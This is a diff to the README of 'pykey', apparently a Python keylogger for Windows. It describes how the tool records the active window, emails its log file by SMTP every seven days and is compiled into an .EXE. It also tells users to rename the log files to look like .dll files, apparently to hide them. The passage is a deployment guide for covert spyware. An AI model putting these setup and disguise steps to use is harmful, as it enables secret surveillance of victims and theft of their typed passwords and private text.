rafaelcuns/pykey/README.md

     <li>Datetime - to check the last date that the script has sent the log file and compare it with the current date</li>
     <li>Linecache - to get any line from a text file</li>
     <li>Smtplib - to send the email</li>
-    <li>And Pyautogui - to get the active window name</li>
+    <li>Pyautogui - to get the active window name</li>
+    <li>And Sys - to increase the recursion limit of the script</li>
 </ul>
 <p>It's importante to note that this script uses Pyinstaller to compile the software allowing him to run on Windows as a .EXE file</p>
 <h2>How to use</h2>
 <p>First, you need to check if you have all the libs and dependencies installed using pip.</p>
-<p>Change the necessary time to send the log in line 27.
+<p>Change the necessary time to send the log in line 28.
 The default is 7 days, if it pass that stipulated time then the script will send the email and restart the log file.</p>
 <p>Then you can start changing "check_file" and "log_file" to something like:</p>
 <ul>
     <li>check.dll and log.dll</li>